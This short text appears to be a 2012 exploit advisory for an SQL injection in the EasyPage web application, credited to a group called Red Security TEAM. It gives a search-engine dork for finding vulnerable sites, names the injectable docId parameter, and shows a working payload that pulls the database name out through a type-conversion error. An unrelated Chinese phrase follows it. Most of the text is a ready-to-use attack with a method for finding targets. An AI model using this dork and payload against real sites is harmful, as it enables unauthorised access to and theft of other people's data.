# # Title : EasyPage SQL Injection Vulnerability # Author: Red Security TEAM # Date: 19/01/2012 # Risk: High # Vendor: http://karait.com/ # Tested On : Windows Server 2008 (Microsoft-IIS/7.5) # Dork: inurl:default.aspx?page=Document&app=Documents&docId=* # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home: http://RedSecurity.COM # # Exploit : # http://server/default.aspx?page=Document&app=Documents&docId=[SQLi] # # Example : # # [Get Database Name] # http://server/default.aspx?page=Document&app=Documents&docId=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1 #
体验盒子
